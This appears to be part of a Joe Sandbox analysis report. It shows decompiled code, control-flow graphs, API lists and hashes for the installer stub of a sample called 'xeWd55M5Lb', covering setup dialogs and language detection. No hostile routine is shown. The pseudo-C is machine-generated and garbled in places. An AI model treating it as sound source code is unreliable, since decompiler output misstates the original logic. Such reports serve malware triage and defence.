                                                          0x004069b5
                                                          0x00000000

                                                          APIs
                                                          • FindFirstFileW.KERNELBASE(7620FAA0,00426798,00425F50,00406088,00425F50,00425F50,00000000,00425F50,00425F50,7620FAA0,?,7620F560,00405D94,?,7620FAA0,7620F560), ref: 004069A9
                                                          • FindClose.KERNEL32(00000000), ref: 004069B5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFileFirst
                                                          • String ID:
                                                          • API String ID: 2295610775-0
                                                          • Opcode ID: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                          • Instruction ID: 0ca7534fdffec89160a31ceabb6ef5ff718bfc83d1618d69d17f9e635378cbc3
                                                          • Opcode Fuzzy Hash: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                          • Instruction Fuzzy Hash: 5ED012B15192205FC34057387E0C84B7A989F563317268A36B4AAF11E0CB348C3297AC
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 141 4040c5-4040d7 142 4040dd-4040e3 141->142 143 40423e-40424d 141->143 142->143 144 4040e9-4040f2 142->144 145 40429c-4042b1 143->145 146 40424f-40428a GetDlgItem * 2 call 4045c4 KiUserCallbackDispatcher call 40140b 143->146 149 4040f4-404101 SetWindowPos 144->149 150 404107-40410e 144->150 147 4042f1-4042f6 call 404610 145->147 148 4042b3-4042b6 145->148 175 40428f-404297 146->175 160 4042fb-404316 147->160 152 4042b8-4042c3 call 401389 148->152 153 4042e9-4042eb 148->153 149->150 155 404110-40412a ShowWindow 150->155 156 404152-404158 150->156 152->153 177 4042c5-4042e4 SendMessageW 152->177 153->147 159 404591 153->159 161 404130-404143 GetWindowLongW 155->161 162 40422b-404239 call 40462b 155->162 163 404171-404174 156->163 164 40415a-40416c DestroyWindow 156->164 173 404593-40459a 159->173 170 404318-40431a call 40140b 160->170 171 40431f-404325 160->171 161->162 172 404149-40414c ShowWindow 161->172 162->173 166 404176-404182 SetWindowLongW 163->166 167 404187-40418d 163->167 174 40456e-404574 164->174 166->173 167->162 176 404193-4041a2 GetDlgItem 167->176 170->171 181 40432b-404336 171->181 182 40454f-404568 DestroyWindow EndDialog 171->182 172->156 174->159 180 404576-40457c 174->180 175->145 183 4041c1-4041c4 176->183 184 4041a4-4041bb SendMessageW IsWindowEnabled 176->184 177->173 180->159 185 40457e-404587 ShowWindow 180->185 181->182 186 40433c-404389 call 4066a5 call 4045c4 * 3 GetDlgItem 181->186 182->174 187 4041c6-4041c7 183->187 188 4041c9-4041cc 183->188 184->159 184->183 185->159 213 404393-4043cf ShowWindow EnableWindow call 4045e6 EnableWindow 186->213 214 40438b-404390 186->214 191 4041f7-4041fc call 40459d 187->191 192 4041da-4041df 188->192 193 4041ce-4041d4 188->193 191->162 196 404215-404225 SendMessageW 192->196 198 4041e1-4041e7 192->198 193->196 197 4041d6-4041d8 193->197 196->162 197->191 201 4041e9-4041ef call 40140b 198->201 202 4041fe-404207 call 40140b 198->202 211 4041f5 201->211 202->162 210 404209-404213 202->210 210->211 211->191 217 4043d1-4043d2 213->217 218 4043d4 213->218 214->213 219 4043d6-404404 GetSystemMenu EnableMenuItem SendMessageW 217->219 218->219 220 404406-404417 SendMessageW 219->220 221 404419 219->221 222 40441f-40445e call 4045f9 call 4040a6 call 406668 lstrlenW call 4066a5 SetWindowTextW call 401389 220->222 221->222 222->160 233 404464-404466 222->233 233->160 234 40446c-404470 233->234 235 404472-404478 234->235 236 40448f-4044a3 DestroyWindow 234->236 235->159 238 40447e-404484 235->238 236->174 237 4044a9-4044d6 CreateDialogParamW 236->237 237->174 239 4044dc-404533 call 4045c4 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 237->239 238->160 240 40448a 238->240 239->159 245 404535-40454d ShowWindow call 404610 239->245 240->159 245->174
                                                          C-Code - Quality: 84%
                                                          			E004040C5(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
                                                          				struct HWND__* _v28;
                                                          				void* _v84;
                                                          				void* _v88;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t34;
                                                          				signed int _t36;
                                                          				signed int _t38;
                                                          				struct HWND__* _t48;
                                                          				signed int _t67;
                                                          				struct HWND__* _t73;
                                                          				signed int _t86;
                                                          				struct HWND__* _t91;
                                                          				signed int _t99;
                                                          				int _t103;
                                                          				signed int _t117;
                                                          				int _t118;
                                                          				int _t122;
                                                          				signed int _t124;
                                                          				struct HWND__* _t127;
                                                          				struct HWND__* _t128;
                                                          				int _t129;
                                                          				intOrPtr _t130;
                                                          				long _t133;
                                                          				int _t135;
                                                          				int _t136;
                                                          				void* _t137;
                                                          				void* _t145;
                                                          
                                                          				_t130 = _a8;
                                                          				if(_t130 == 0x110 || _t130 == 0x408) {
                                                          					_t34 = _a12;
                                                          					_t127 = _a4;
                                                          					__eflags = _t130 - 0x110;
                                                          					 *0x423730 = _t34;
                                                          					if(_t130 == 0x110) {
                                                          						 *0x42a268 = _t127;
                                                          						 *0x423744 = GetDlgItem(_t127, 1);
                                                          						_t91 = GetDlgItem(_t127, 2);
                                                          						_push(0xffffffff);
                                                          						_push(0x1c);
                                                          						 *0x421710 = _t91;
                                                          						E004045C4(_t127);
                                                          						SetClassLongW(_t127, 0xfffffff2,  *0x429248); // executed
                                                          						 *0x42922c = E0040140B(4);
                                                          						_t34 = 1;
                                                          						__eflags = 1;
                                                          						 *0x423730 = 1;
                                                          					}
                                                          					_t124 =  *0x40a39c; // 0x0
                                                          					_t136 = 0;
                                                          					_t133 = (_t124 << 6) +  *0x42a280;
                                                          					__eflags = _t124;
                                                          					if(_t124 < 0) {
                                                          						L36:
                                                          						E00404610(0x40b);
                                                          						while(1) {
                                                          							_t36 =  *0x423730;
                                                          							 *0x40a39c =  *0x40a39c + _t36;
                                                          							_t133 = _t133 + (_t36 << 6);
                                                          							_t38 =  *0x40a39c; // 0x0
                                                          							__eflags = _t38 -  *0x42a284;
                                                          							if(_t38 ==  *0x42a284) {
                                                          								E0040140B(1);
                                                          							}
                                                          							__eflags =  *0x42922c - _t136;
                                                          							if( *0x42922c != _t136) {
                                                          								break;
                                                          							}
                                                          							__eflags =  *0x40a39c -  *0x42a284; // 0x0
                                                          							if(__eflags >= 0) {
                                                          								break;
                                                          							}
                                                          							_t117 =  *(_t133 + 0x14);
                                                          							E004066A5(_t117, _t127, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
                                                          							_push( *((intOrPtr*)(_t133 + 0x20)));
                                                          							_push(0xfffffc19);
                                                          							E004045C4(_t127);
                                                          							_push( *((intOrPtr*)(_t133 + 0x1c)));
                                                          							_push(0xfffffc1b);
                                                          							E004045C4(_t127);
                                                          							_push( *((intOrPtr*)(_t133 + 0x28)));
                                                          							_push(0xfffffc1a);
                                                          							E004045C4(_t127);
                                                          							_t48 = GetDlgItem(_t127, 3);
                                                          							__eflags =  *0x42a2ec - _t136;
                                                          							_v28 = _t48;
                                                          							if( *0x42a2ec != _t136) {
                                                          								_t117 = _t117 & 0x0000fefd | 0x00000004;
                                                          								__eflags = _t117;
                                                          							}
                                                          							ShowWindow(_t48, _t117 & 0x00000008);
                                                          							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100);
                                                          							E004045E6(_t117 & 0x00000002);
                                                          							_t118 = _t117 & 0x00000004;
                                                          							EnableWindow( *0x421710, _t118);
                                                          							__eflags = _t118 - _t136;
                                                          							if(_t118 == _t136) {
                                                          								_push(1);
                                                          							} else {
                                                          								_push(_t136);
                                                          							}
                                                          							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
                                                          							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
                                                          							__eflags =  *0x42a2ec - _t136;
                                                          							if( *0x42a2ec == _t136) {
                                                          								_push( *0x423744);
                                                          							} else {
                                                          								SendMessageW(_t127, 0x401, 2, _t136);
                                                          								_push( *0x421710);
                                                          							}
                                                          							E004045F9();
                                                          							E00406668(0x423748, E004040A6());
                                                          							E004066A5(0x423748, _t127, _t133,  &(0x423748[lstrlenW(0x423748)]),  *((intOrPtr*)(_t133 + 0x18)));
                                                          							SetWindowTextW(_t127, 0x423748);
                                                          							_push(_t136);
                                                          							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
                                                          							__eflags = _t67;
                                                          							if(_t67 != 0) {
                                                          								continue;
                                                          							} else {
                                                          								__eflags =  *_t133 - _t136;
                                                          								if( *_t133 == _t136) {
                                                          									continue;
                                                          								}
                                                          								__eflags =  *(_t133 + 4) - 5;
                                                          								if( *(_t133 + 4) != 5) {
                                                          									DestroyWindow( *0x429238);
                                                          									 *0x422720 = _t133;
                                                          									__eflags =  *_t133 - _t136;
                                                          									if( *_t133 <= _t136) {
                                                          										goto L60;
                                                          									}
                                                          									_t73 = CreateDialogParamW( *0x42a260,  *_t133 +  *0x429240 & 0x0000ffff, _t127,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133);
                                                          									__eflags = _t73 - _t136;
                                                          									 *0x429238 = _t73;
                                                          									if(_t73 == _t136) {
                                                          										goto L60;
                                                          									}
                                                          									_push( *((intOrPtr*)(_t133 + 0x2c)));
                                                          									_push(6);
                                                          									E004045C4(_t73);
                                                          									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
                                                          									ScreenToClient(_t127, _t137 + 0x10);
                                                          									SetWindowPos( *0x429238, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
                                                          									_push(_t136);
                                                          									E00401389( *((intOrPtr*)(_t133 + 0xc)));
                                                          									__eflags =  *0x42922c - _t136;
                                                          									if( *0x42922c != _t136) {
                                                          										goto L63;
                                                          									}
                                                          									ShowWindow( *0x429238, 8);
                                                          									E00404610(0x405);
                                                          									goto L60;
                                                          								}
                                                          								__eflags =  *0x42a2ec - _t136;
                                                          								if( *0x42a2ec != _t136) {
                                                          									goto L63;
                                                          								}
                                                          								__eflags =  *0x42a2e0 - _t136;
                                                          								if( *0x42a2e0 != _t136) {
                                                          									continue;
                                                          								}
                                                          								goto L63;
                                                          							}
                                                          						}
                                                          						DestroyWindow( *0x429238); // executed
                                                          						 *0x42a268 = _t136;
                                                          						EndDialog(_t127,  *0x421f18);
                                                          						goto L60;
                                                          					} else {
                                                          						__eflags = _t34 - 1;
                                                          						if(_t34 != 1) {
                                                          							L35:
                                                          							__eflags =  *_t133 - _t136;
                                                          							if( *_t133 == _t136) {
                                                          								goto L63;
                                                          							}
                                                          							goto L36;
                                                          						}
                                                          						_push(0);
                                                          						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
                                                          						__eflags = _t86;
                                                          						if(_t86 == 0) {
                                                          							goto L35;
                                                          						}
                                                          						SendMessageW( *0x429238, 0x40f, 0, 1);
                                                          						__eflags =  *0x42922c;
                                                          						return 0 |  *0x42922c == 0x00000000;
                                                          					}
                                                          				} else {
                                                          					_t127 = _a4;
                                                          					_t136 = 0;
                                                          					if(_t130 == 0x47) {
                                                          						SetWindowPos( *0x423728, _t127, 0, 0, 0, 0, 0x13);
                                                          					}
                                                          					_t122 = _a12;
                                                          					if(_t130 != 5) {
                                                          						L8:
                                                          						if(_t130 != 0x40d) {
                                                          							__eflags = _t130 - 0x11;
                                                          							if(_t130 != 0x11) {
                                                          								__eflags = _t130 - 0x111;
                                                          								if(_t130 != 0x111) {
                                                          									goto L28;
                                                          								}
                                                          								_t135 = _t122 & 0x0000ffff;
                                                          								_t128 = GetDlgItem(_t127, _t135);
                                                          								__eflags = _t128 - _t136;
                                                          								if(_t128 == _t136) {
                                                          									L15:
                                                          									__eflags = _t135 - 1;
                                                          									if(_t135 != 1) {
                                                          										__eflags = _t135 - 3;
                                                          										if(_t135 != 3) {
                                                          											_t129 = 2;
                                                          											__eflags = _t135 - _t129;
                                                          											if(_t135 != _t129) {
                                                          												L27:
                                                          												SendMessageW( *0x429238, 0x111, _t122, _a16);
                                                          												goto L28;
                                                          											}
                                                          											__eflags =  *0x42a2ec - _t136;
                                                          											if( *0x42a2ec == _t136) {
                                                          												_t99 = E0040140B(3);
                                                          												__eflags = _t99;
                                                          												if(_t99 != 0) {
                                                          													goto L28;
                                                          												}
                                                          												 *0x421f18 = 1;
                                                          												L23:
                                                          												_push(0x78);
                                                          												L24:
                                                          												E0040459D();
                                                          												goto L28;
                                                          											}
                                                          											E0040140B(_t129);
                                                          											 *0x421f18 = _t129;
                                                          											goto L23;
                                                          										}
                                                          										__eflags =  *0x40a39c - _t136; // 0x0
                                                          										if(__eflags <= 0) {
                                                          											goto L27;
                                                          										}
                                                          										_push(0xffffffff);
                                                          										goto L24;
                                                          									}
                                                          									_push(_t135);
                                                          									goto L24;
                                                          								}
                                                          								SendMessageW(_t128, 0xf3, _t136, _t136);
                                                          								_t103 = IsWindowEnabled(_t128);
                                                          								__eflags = _t103;
                                                          								if(_t103 == 0) {
                                                          									L63:
                                                          									return 0;
                                                          								}
                                                          								goto L15;
                                                          							}
                                                          							SetWindowLongW(_t127, _t136, _t136);
                                                          							return 1;
                                                          						}
                                                          						DestroyWindow( *0x429238);
                                                          						 *0x429238 = _t122;
                                                          						L60:
                                                          						_t145 =  *0x425748 - _t136; // 0x0
                                                          						if(_t145 == 0 &&  *0x429238 != _t136) {
                                                          							ShowWindow(_t127, 0xa);
                                                          							 *0x425748 = 1;
                                                          						}
                                                          						goto L63;
                                                          					} else {
                                                          						asm("sbb eax, eax");
                                                          						ShowWindow( *0x423728,  ~(_t122 - 1) & 0x00000005);
                                                          						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
                                                          							L28:
                                                          							return E0040462B(_a8, _t122, _a16);
                                                          						} else {
                                                          							ShowWindow(_t127, 4);
                                                          							goto L8;
                                                          						}
                                                          					}
                                                          				}
                                                          			}
































                                                          0x004040d0
                                                          0x004040d7
                                                          0x0040423e
                                                          0x00404242
                                                          0x00404246
                                                          0x00404248
                                                          0x0040424d
                                                          0x00404258
                                                          0x00404263
                                                          0x00404268
                                                          0x0040426a
                                                          0x0040426c
                                                          0x0040426f
                                                          0x00404274
                                                          0x00404282
                                                          0x0040428f
                                                          0x00404296
                                                          0x00404296
                                                          0x00404297
                                                          0x00404297
                                                          0x0040429c
                                                          0x004042a2
                                                          0x004042a9
                                                          0x004042af
                                                          0x004042b1
                                                          0x004042f1
                                                          0x004042f6
                                                          0x004042fb
                                                          0x004042fb
                                                          0x00404300
                                                          0x00404309
                                                          0x0040430b
                                                          0x00404310
                                                          0x00404316
                                                          0x0040431a
                                                          0x0040431a
                                                          0x0040431f
                                                          0x00404325
                                                          0x00000000
                                                          0x00000000
                                                          0x00404330
                                                          0x00404336
                                                          0x00000000
                                                          0x00000000
                                                          0x0040433f
                                                          0x00404347
                                                          0x0040434c
                                                          0x0040434f
                                                          0x00404355
                                                          0x0040435a
                                                          0x0040435d
                                                          0x00404363
                                                          0x00404368
                                                          0x0040436b
                                                          0x00404371
                                                          0x00404379
                                                          0x0040437f
                                                          0x00404385
                                                          0x00404389
                                                          0x00404390
                                                          0x00404390
                                                          0x00404390
                                                          0x0040439a
                                                          0x004043ac
                                                          0x004043b8
                                                          0x004043bd
                                                          0x004043c7
                                                          0x004043cd
                                                          0x004043cf
                                                          0x004043d4
                                                          0x004043d1
                                                          0x004043d1
                                                          0x004043d1
                                                          0x004043e4
                                                          0x004043fc
                                                          0x004043fe
                                                          0x00404404
                                                          0x00404419
                                                          0x00404406
                                                          0x0040440f
                                                          0x00404411
                                                          0x00404411
                                                          0x0040441f
                                                          0x00404430
                                                          0x00404446
                                                          0x0040444d
                                                          0x00404453
                                                          0x00404457
                                                          0x0040445c
                                                          0x0040445e
                                                          0x00000000
                                                          0x00404464
                                                          0x00404464
                                                          0x00404466
                                                          0x00000000
                                                          0x00000000
                                                          0x0040446c
                                                          0x00404470
                                                          0x00404495
                                                          0x0040449b
                                                          0x004044a1
                                                          0x004044a3
                                                          0x00000000
                                                          0x00000000
                                                          0x004044c9
                                                          0x004044cf
                                                          0x004044d1
                                                          0x004044d6
                                                          0x00000000
                                                          0x00000000
                                                          0x004044dc
                                                          0x004044df
                                                          0x004044e2
                                                          0x004044f9
                                                          0x00404505
                                                          0x0040451e
                                                          0x00404524
                                                          0x00404528
                                                          0x0040452d
                                                          0x00404533
                                                          0x00000000
                                                          0x00000000
                                                          0x0040453d
                                                          0x00404548
                                                          0x00000000
                                                          0x00404548
                                                          0x00404472
                                                          0x00404478
                                                          0x00000000
                                                          0x00000000
                                                          0x0040447e
                                                          0x00404484
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040448a
                                                          0x0040445e
                                                          0x00404555
                                                          0x00404561
                                                          0x00404568
                                                          0x00000000
                                                          0x004042b3
                                                          0x004042b3
                                                          0x004042b6
                                                          0x004042e9
                                                          0x004042e9
                                                          0x004042eb
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004042eb
                                                          0x004042b8
                                                          0x004042bc
                                                          0x004042c1
                                                          0x004042c3
                                                          0x00000000
                                                          0x00000000
                                                          0x004042d3
                                                          0x004042db
                                                          0x00000000
                                                          0x004042e1
                                                          0x004040e9
                                                          0x004040e9
                                                          0x004040ed
                                                          0x004040f2
                                                          0x00404101
                                                          0x00404101
                                                          0x00404107
                                                          0x0040410e
                                                          0x00404152
                                                          0x00404158
                                                          0x00404171
                                                          0x00404174
                                                          0x00404187
                                                          0x0040418d
                                                          0x00000000
                                                          0x00000000
                                                          0x00404193
                                                          0x0040419e
                                                          0x004041a0
                                                          0x004041a2
                                                          0x004041c1
                                                          0x004041c1
                                                          0x004041c4
                                                          0x004041c9
                                                          0x004041cc
                                                          0x004041dc
                                                          0x004041dd
                                                          0x004041df
                                                          0x00404215
                                                          0x00404225
                                                          0x00000000
                                                          0x00404225
                                                          0x004041e1
                                                          0x004041e7
                                                          0x00404200
                                                          0x00404205
                                                          0x00404207
                                                          0x00000000
                                                          0x00000000
                                                          0x00404209
                                                          0x004041f5
                                                          0x004041f5
                                                          0x004041f7
                                                          0x004041f7
                                                          0x00000000
                                                          0x004041f7
                                                          0x004041ea
                                                          0x004041ef
                                                          0x00000000
                                                          0x004041ef
                                                          0x004041ce
                                                          0x004041d4
                                                          0x00000000
                                                          0x00000000
                                                          0x004041d6
                                                          0x00000000
                                                          0x004041d6
                                                          0x004041c6
                                                          0x00000000
                                                          0x004041c6
                                                          0x004041ac
                                                          0x004041b3
                                                          0x004041b9
                                                          0x004041bb
                                                          0x00404591
                                                          0x00000000
                                                          0x00404591
                                                          0x00000000
                                                          0x004041bb
                                                          0x00404179
                                                          0x00000000
                                                          0x00404181
                                                          0x00404160
                                                          0x00404166
                                                          0x0040456e
                                                          0x0040456e
                                                          0x00404574
                                                          0x00404581
                                                          0x00404587
                                                          0x00404587
                                                          0x00000000
                                                          0x00404110
                                                          0x00404115
                                                          0x00404121
                                                          0x0040412a
                                                          0x0040422b
                                                          0x00000000
                                                          0x00404149
                                                          0x0040414c
                                                          0x00000000
                                                          0x0040414c
                                                          0x0040412a
                                                          0x0040410e

                                                          APIs
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404101
                                                          • ShowWindow.USER32(?), ref: 00404121
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404133
                                                          • ShowWindow.USER32(?,00000004), ref: 0040414C
                                                          • DestroyWindow.USER32 ref: 00404160
                                                          • SetWindowLongW.USER32 ref: 00404179
                                                          • GetDlgItem.USER32 ref: 00404198
                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041AC
                                                          • IsWindowEnabled.USER32(00000000), ref: 004041B3
                                                          • GetDlgItem.USER32 ref: 0040425E
                                                          • GetDlgItem.USER32 ref: 00404268
                                                          • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00404282
                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D3
                                                          • GetDlgItem.USER32 ref: 00404379
                                                          • ShowWindow.USER32(00000000,?), ref: 0040439A
                                                          • EnableWindow.USER32(?,?), ref: 004043AC
                                                          • EnableWindow.USER32(?,?), ref: 004043C7
                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004043DD
                                                          • EnableMenuItem.USER32 ref: 004043E4
                                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004043FC
                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040440F
                                                          • lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404439
                                                          • SetWindowTextW.USER32(?,00423748), ref: 0040444D
                                                          • ShowWindow.USER32(?,0000000A), ref: 00404581
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID: Window$Item$MessageSendShow$Enable$LongMenu$CallbackDestroyDispatcherEnabledSystemTextUserlstrlen
                                                          • String ID: H7B
                                                          • API String ID: 2475350683-2300413410
                                                          • Opcode ID: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                                                          • Instruction ID: 1d4a55fced449df2e2a9dfc159c1061f424388fbea236c5341ec002980a30b6c
                                                          • Opcode Fuzzy Hash: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                                                          • Instruction Fuzzy Hash: C0C1C2B1600604FBDB216F61EE85E2A3B78EB85745F40097EF781B51F0CB3958529B2E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 248 403d17-403d2f call 406a35 251 403d31-403d3c GetUserDefaultUILanguage call 4065af 248->251 252 403d43-403d7a call 406536 248->252 255 403d41 251->255 258 403d92-403d98 lstrcatW 252->258 259 403d7c-403d8d call 406536 252->259 257 403d9d-403dc6 call 403fed call 40603f 255->257 265 403e58-403e60 call 40603f 257->265 266 403dcc-403dd1 257->266 258->257 259->258 271 403e62-403e69 call 4066a5 265->271 272 403e6e-403e93 LoadImageW 265->272 266->265 267 403dd7-403dff call 406536 266->267 267->265 274 403e01-403e05 267->274 271->272 276 403f14-403f1c call 40140b 272->276 277 403e95-403ec5 RegisterClassW 272->277 278 403e17-403e23 lstrlenW 274->278 279 403e07-403e14 call 405f64 274->279 290 403f26-403f31 call 403fed 276->290 291 403f1e-403f21 276->291 280 403fe3 277->280 281 403ecb-403f0f SystemParametersInfoW CreateWindowExW 277->281 285 403e25-403e33 lstrcmpiW 278->285 286 403e4b-403e53 call 405f37 call 406668 278->286 279->278 284 403fe5-403fec 280->284 281->276 285->286 289 403e35-403e3f GetFileAttributesW 285->289 286->265 293 403e41-403e43 289->293 294 403e45-403e46 call 405f83 289->294 300 403f37-403f51 ShowWindow call 4069c5 290->300 301 403fba-403fc2 call 40579d 290->301 291->284 293->286 293->294 294->286 306 403f53-403f58 call 4069c5 300->306 307 403f5d-403f6f GetClassInfoW 300->307 308 403fc4-403fca 301->308 309 403fdc-403fde call 40140b 301->309 306->307 312 403f71-403f81 GetClassInfoW RegisterClassW 307->312 313 403f87-403faa DialogBoxParamW call 40140b 307->313 308->291 314 403fd0-403fd7 call 40140b 308->314 309->280 312->313 317 403faf-403fb8 call 403c67 313->317 314->291 317->284
                                                          C-Code - Quality: 96%
                                                          			E00403D17(void* __eflags) {
                                                          				intOrPtr _v4;
                                                          				intOrPtr _v8;
                                                          				int _v12;
                                                          				void _v16;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				intOrPtr* _t22;
                                                          				void* _t30;
                                                          				void* _t32;
                                                          				int _t33;
                                                          				void* _t36;
                                                          				int _t39;
                                                          				int _t40;
                                                          				int _t44;
                                                          				short _t63;
                                                          				WCHAR* _t65;
                                                          				signed char _t69;
                                                          				signed short _t73;
                                                          				WCHAR* _t76;
                                                          				intOrPtr _t82;
                                                          				WCHAR* _t87;
                                                          
                                                          				_t82 =  *0x42a270;
                                                          				_t22 = E00406A35(2);
                                                          				_t90 = _t22;
                                                          				if(_t22 == 0) {
                                                          					_t76 = 0x423748;
                                                          					L"1033" = 0x30;
                                                          					 *0x437002 = 0x78;
                                                          					 *0x437004 = 0;
                                                          					E00406536(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423748, 0);
                                                          					__eflags =  *0x423748;
                                                          					if(__eflags == 0) {
                                                          						E00406536(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423748, 0);
                                                          					}
                                                          					lstrcatW(L"1033", _t76);
                                                          				} else {
                                                          					_t73 =  *_t22(); // executed
                                                          					E004065AF(L"1033", _t73 & 0x0000ffff);
                                                          				}
                                                          				E00403FED(_t78, _t90);
                                                          				_t86 = L"C:\\Users\\hardz\\AppData\\Local\\Temp";
                                                          				 *0x42a2e0 =  *0x42a278 & 0x00000020;
                                                          				 *0x42a2fc = 0x10000;
                                                          				if(E0040603F(_t90, L"C:\\Users\\hardz\\AppData\\Local\\Temp") != 0) {
                                                          					L16:
                                                          					if(E0040603F(_t98, _t86) == 0) {
                                                          						E004066A5(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
                                                          					}
                                                          					_t30 = LoadImageW( *0x42a260, 0x67, 1, 0, 0, 0x8040); // executed
                                                          					 *0x429248 = _t30;
                                                          					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                                                          						L21:
                                                          						if(E0040140B(0) == 0) {
                                                          							_t32 = E00403FED(_t78, __eflags);
                                                          							__eflags =  *0x42a300;
                                                          							if( *0x42a300 != 0) {
                                                          								_t33 = E0040579D(_t32, 0);
                                                          								__eflags = _t33;
                                                          								if(_t33 == 0) {
                                                          									E0040140B(1);
                                                          									goto L33;
                                                          								}
                                                          								__eflags =  *0x42922c;
                                                          								if( *0x42922c == 0) {
                                                          									E0040140B(2);
                                                          								}
                                                          								goto L22;
                                                          							}
                                                          							ShowWindow( *0x423728, 5); // executed
                                                          							_t39 = E004069C5("RichEd20"); // executed
                                                          							__eflags = _t39;
                                                          							if(_t39 == 0) {
                                                          								E004069C5("RichEd32");
                                                          							}
                                                          							_t87 = L"RichEdit20W";
                                                          							_t40 = GetClassInfoW(0, _t87, 0x429200);
                                                          							__eflags = _t40;
                                                          							if(_t40 == 0) {
                                                          								GetClassInfoW(0, L"RichEdit", 0x429200);
                                                          								 *0x429224 = _t87;
                                                          								RegisterClassW(0x429200);
                                                          							}
                                                          							_t44 = DialogBoxParamW( *0x42a260,  *0x429240 + 0x00000069 & 0x0000ffff, 0, E004040C5, 0); // executed
                                                          							E00403C67(E0040140B(5), 1);
                                                          							return _t44;
                                                          						}
                                                          						L22:
                                                          						_t36 = 2;
                                                          						return _t36;
                                                          					} else {
                                                          						_t78 =  *0x42a260;
                                                          						 *0x429204 = E00401000;
                                                          						 *0x429210 =  *0x42a260;
                                                          						 *0x429214 = _t30;
                                                          						 *0x429224 = 0x40a3b4;
                                                          						if(RegisterClassW(0x429200) == 0) {
                                                          							L33:
                                                          							__eflags = 0;
                                                          							return 0;
                                                          						}
                                                          						SystemParametersInfoW(0x30, 0,  &_v16, 0);
